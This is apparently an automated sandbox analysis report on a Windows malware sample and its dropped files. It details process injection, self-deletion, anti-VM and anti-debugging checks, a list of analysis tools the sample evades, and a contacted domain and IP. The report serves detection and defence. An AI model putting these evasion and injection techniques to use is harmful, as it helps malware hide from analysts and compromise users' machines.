Source: C:\Users\user\AppData\Roaming\beirutt Code function: 7_2_0040A2E2 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer, 7_2_0040A2E2
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name: .juv
Source: file.exe Static PE information: section name: .rur
Source: file.exe Static PE information: section name: .cenepem
Source: C676.exe.3.dr Static PE information: section name: .huxuho
Source: C676.exe.3.dr Static PE information: section name: .gini
Source: C676.exe.3.dr Static PE information: section name: .vab
Source: beirutt.3.dr Static PE information: section name: .juv
Source: beirutt.3.dr Static PE information: section name: .rur
Source: beirutt.3.dr Static PE information: section name: .cenepem
Source: 4434343.dll.9.dr Static PE information: section name: .00cfg
Source: initial sample Static PE information: section name: .text entropy: 7.880058673023214
Source: initial sample Static PE information: section name: .text entropy: 7.648160210316085
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\beirutt Jump to dropped file
Drops PE files
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\43D0.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe File created: C:\Users\user\AppData\Local\Temp\4434343.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\beirutt Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\C676.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\C4AA.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Deletes itself after installation
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\file.exe Jump to behavior
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\beirutt:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\43D0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\43D0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\43D0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\43D0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: 0000000D.00000003.510365391.0000000003056000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.573423971.0000000004AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: C4AA.exe, 00000009.00000002.581264787.0000000002D80000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: DLLREGISTERSERVERWKANIMHDMAWWV3SZQXYVBUPQC78ZCSCYZEXUSDVMOYWFSOSYSANDBOXK5IQR5XKKHFI0OIXFMGQKSOZVXBFCBSXP0CQKIPRNCYQHM3WLLXT6CDBBS26ESKV7845SWCP2EBLGWHVHDTWSOGZ9U9CGZZSDH2UM9TZTCXYZLXSGKNIDIWISTXFFJPSHTTP://GEKJEGOUDN6I5FBCES.JOMF6MTOBKL32EAI1QWQXSXPNFYV2SMICROSOFT BASIC DISPLAY ADAPTERAPXALPLEWOMRTXOQBIS5VVQOZJTDWDYPDWOJSVZO2QACQSIOYXZAFZ3U9IKX2BQN6EZZOXJP5PSUZKQMTGHZQELR5EG7GRIMERCTFOUNCFE4BGUM7H3R60PJIOCTMJ0M%LS\%D.DLLQU673JXMPB9XS6BLT0XDS1ALT0EJ5HLLAKOWFXNBJFIIOLTKI8WPBYDTNFYR40QJP9YSA5NKHRYBKS7IXE6TWUFX1EVDSUKHNIFAX TEGAWO NIP XEHN9YXFM4WGP9YUO5HXPMC4XQ1BZLDJLNGVBOXTRAY.EXEVMWARETRAY.EXEWECHAT.EXEVMWAREUSER.EXEFIDDLER.EXEPROCESSHACKER.EXEQQ.EXEPROCEXP.EXERDPCLIP.EXEWIRESHARK.EXEKAWEXI GEQUECI BOVOJ.EXEVBOXSERVICE.EXEVGAUTHSERVICE.EXEVMTOOLSD.EXEPRL_CC.EXEHTTPDEBUGGERUI.EXEHTTPANALYZERSTDV7.EXEPROCEXP64.EXE9VCQBULREEOHDRQECLOUDSAFELINEYQ7T94QZPUDEORTE80URPBYHQ3908APEYCDDGGZJIPRJTKOE8J4WDLLBX1APOW9EVBZ1UO2T2UBMGTUDBSQDYJSBALF5CGVCSFIMBSIBECUOLZPCIK2VP28IR0VTY4TBDYVLFRSD5XNE93CYIIGVV5KBWQ4W2ROU3OQVPIRDLVGRVMVTMQRP5J7SUNTW6WJSCCDMAYGHINOZWAXRSZKCI5FN6D9Y9HJRZHIX2JJ5NDQDFLBQ7GSN9CORX41KRUAQXIHNEOIQB1VONHHQFPG6N3LIJPAESKGQBMH2WFPZKMIH3JPNW2WWL4QOWW0SAVLN7QPQACULBYLOPUMLDJFMGRXYRKQKOVNJKRD4PQP2PQ8FNC7JABGGRSW4W0K7VSSICQYE9JT8N0NVH1MITQSNOGZQBXMIJYLHV2DLCZJ486OVC7EHTPLWZ4NT1DG4JSQGYZCQBMR6MBLZRXJGOXTXCYOA7FBPN0EGH7EX8DG8NSYCSAOGD5G0NV7R0LVA09KGCAWTJO5TB2I2LHAGZRMZ4T0EPASO079GSLJNUY5E4DLIUTNFLXFUZSNAEVRRIGWCHIYUGQ9HHPQODBLBIAQMME3ZWAAGKEJB4GPXYSRTR5EFN43BBTXITK2KKFOG8JCARLOY8GS3RRVRRJNAUFJSZGAKWZM2DEQ8OCWPZQ6O4RIWMRY77FLBKVUSFEYWTPB6Y2CTOYPQLWYAQAY5DNDXG1BSVPPP4JQ5WXP1OQ3Y3DHBZRC5X4KW1CN7YJDB9J450JE0S2RDQL7GXWP4ZKMA4WMYVM2YZR24ZUIL8P9X5RU6F5F2HM4YAEQ4STV1PKJ0
Source: file.exe, 00000000.00000002.397065443.0000000000798000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASWHOOK760H
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\SysWOW64\fontview.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 3980 Thread sleep count: 348 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 5468 Thread sleep count: 211 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 6076 Thread sleep count: 83 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 3652 Thread sleep time: -240000s >= -30000s Jump to behavior
Found evasive API chain (date check)
Source: C:\Users\user\AppData\Local\Temp\C676.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Last function: Thread delayed
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\user\AppData\Roaming\beirutt Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 854 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 844 Jump to behavior
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\SysWOW64\fontview.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4434343.dll Jump to dropped file
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Windows\SysWOW64\fontview.exe Memory allocated: 5170000 memory commit | memory reserve | memory write watch Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe Memory allocated: 5170000 memory commit | memory reserve | memory write watch Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe Memory allocated: 5170000 memory commit | memory reserve | memory write watch Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe Memory allocated: 5170000 memory commit | memory reserve | memory write watch Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\SysWOW64\fontview.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: explorer.exe, 00000003.00000000.387586822.000000000830B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000003.00000003.449577540.000000000834F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
Source: explorer.exe, 00000003.00000000.384012109.00000000059F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
Source: C4AA.exe, 00000009.00000002.573780441.000000000123A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
Source: explorer.exe, 00000003.00000003.449577540.0000000008394000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000003.453675949.0000000008575000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWG5f(
Source: explorer.exe, 00000003.00000003.450669727.000000000CDE5000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#5&
Source: C4AA.exe, 00000009.00000002.581264787.0000000002D80000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: DllRegisterServerwkANimhDMAwWV3szQXyvBuPQC78zCscyzexusDvMOYwfSOSysandboxk5iQr5xKkhFi0oixFMGqksOZvxBFcBSxp0cQkIPrNCyQHM3wLlxT6Cdbbs26eSkv7845SwCp2eblGwhvHDTWSogz9U9CgzzsDh2um9tzTcXYzLxsGKNiDiwisTXFFjpshttp://gEKjeGOUdN6i5fBcEs.jOmF6MtoBKl32eAI1QwqxSxpNFyV2sMicrosoft Basic Display AdapterapxALpLEWoMRTxoqbiS5VVQOzJTDWDypDWoJSVZo2QACQsioYxzAfz3u9IKX2BQn6EzzoxJp5PsUZkqmTghzqELr5eG7GRimerCTfOUnCFE4bGUm7h3r60PJIoCTMJ0m%lS\%d.dllQU673JXmPb9xS6blT0XDs1ALT0EJ5hLlaKOwfxnBjFiiOltkI8wpbYDtnFYR40qjP9YSa5NKhRybkS7ixE6tWUfx1eVdsUkhnifax tegawo nip xehN9YxfM4WgP9Yuo5hXPmc4XQ1BZlDjlngvboxtray.exevmwaretray.exewechat.exevmwareuser.exeFiddler.exeprocesshacker.exeqq.exeprocexp.exerdpclip.exeWireshark.exeKawexi gequeci bovoj.exevboxservice.exeVGAuthService.exevmtoolsd.exeprl_cc.exeHTTPDebuggerUI.exeHttpAnalyzerStdV7.exePROCEXP64.exe9vcQbULrEEOHDRqecloudsafelineyq7T94qzPuDeOrTe80urpbYHQ3908aPeycDDggZJIPRjtkOe8J4Wdllbx1ApOW9evbZ1uo2T2UbMGtUdBSQDYJSbaLF5CgvcsFImbSiBECUOLzpcIk2VP28ir0vTy4TbDYVLfRsd5XNE93cYiigvV5kbWQ4w2roU3OQVpirDLVGrVmVTmqRp5j7SuNTW6WJSccDmayghiNoZWAXRSZKcI5fN6d9y9HJRZHIX2jJ5ndQDFLbQ7Gsn9COrx41kruaQxiHNEOIqB1voNhHQfpG6n3LiJpAEsKGQbMh2wfPZkMIH3jpNw2wwL4qOww0SAvLN7QPqaculbYlOPumLDjFmGrxyrkqKoVNJkrD4pQP2PQ8FNc7JabGGRSw4W0K7VSsICQYE9Jt8N0nVh1MITQsnOGZQBxmijylHv2DLczJ486OVC7eHTPLwz4Nt1Dg4jsqGyzCqbMr6MBLZrXjGOxTXcYoA7fBPn0eGH7Ex8dg8NsycsAOGd5g0Nv7r0LVA09KGcaWtJO5Tb2I2LhAGZrMz4T0Epaso079GslJNUY5E4dliUTNFlXFuZSNaEVRrIGWChIYUgq9hHpqOdBLBiAQmME3ZwAAGkEJB4gPxySrtR5EFN43BbtxiTk2KKfog8JcArlOy8gS3rrvRRJNAUFJSzgakwzM2deQ8oCWpzq6o4rIWMrY77FlbkvUsfeYwtpb6Y2CToyPqlwYaqay5DndXG1BsVppP4Jq5WxP1Oq3y3dHBZrc5X4kw1cn7yJdb9J450JE0s2Rdql7gxWP4zkmA4WMYvM2YZr24zUIl8P9x5RU6f5F2Hm4yAEQ4STv1pKj0
Source: fontview.exe, 0000000D.00000003.518946338.0000000005160000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: DisableGuestVmNetworkConnectivity
Source: explorer.exe, 00000003.00000003.450122194.000000000D009000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.453675949.0000000008575000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.453871207.000000000D00E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000003.00000000.387586822.000000000830B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
Source: fontview.exe, 0000000D.00000003.518946338.0000000005160000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: EnableGuestVmNetworkConnectivity
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_00428390 FindFirstFileExW, 6_2_00428390
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Windows\SysWOW64\fontview.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe Thread information set: HideFromDebugger Jump to behavior
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\Desktop\file.exe System information queried: CodeIntegrityInformation Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\beirutt Code function: 7_2_0040A2E2 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer, 7_2_0040A2E2
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007AF939 push dword ptr fs:[00000030h] 0_2_007AF939
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_0041E1B1 mov ecx, dword ptr fs:[00000030h] 6_2_0041E1B1
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_0042950B mov eax, dword ptr fs:[00000030h] 6_2_0042950B
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_006A8C2B push dword ptr fs:[00000030h] 6_2_006A8C2B
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe Process queried: DebugFlags Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe Process queried: DebugPort Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_00413DCA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00413DCA
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_0042BCAF GetProcessHeap, 6_2_0042BCAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_00414035 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_00414035
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_00413DCA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00413DCA
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_00417E53 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00417E53
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_00413F2C SetUnhandledExceptionFilter, 6_2_00413F2C
Source: C:\Users\user\AppData\Roaming\beirutt Code function: 7_2_00408415 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_00408415
Source: C:\Users\user\AppData\Roaming\beirutt Code function: 7_2_00407A2B SetUnhandledExceptionFilter, 7_2_00407A2B
Source: C:\Users\user\AppData\Roaming\beirutt Code function: 7_2_0040A6C7 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_0040A6C7
Source: C:\Users\user\AppData\Roaming\beirutt Code function: 7_2_00406364 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_00406364

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: potunulit.org
Source: C:\Windows\explorer.exe Network Connect: 188.114.96.3 80 Jump to behavior
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: beirutt.3.dr Jump to dropped file
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\file.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000 protect: page read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Memory allocated: C:\Windows\SysWOW64\fontview.exe base: CD0000 protect: page read and write Jump to behavior
Injects a PE file into a foreign processes
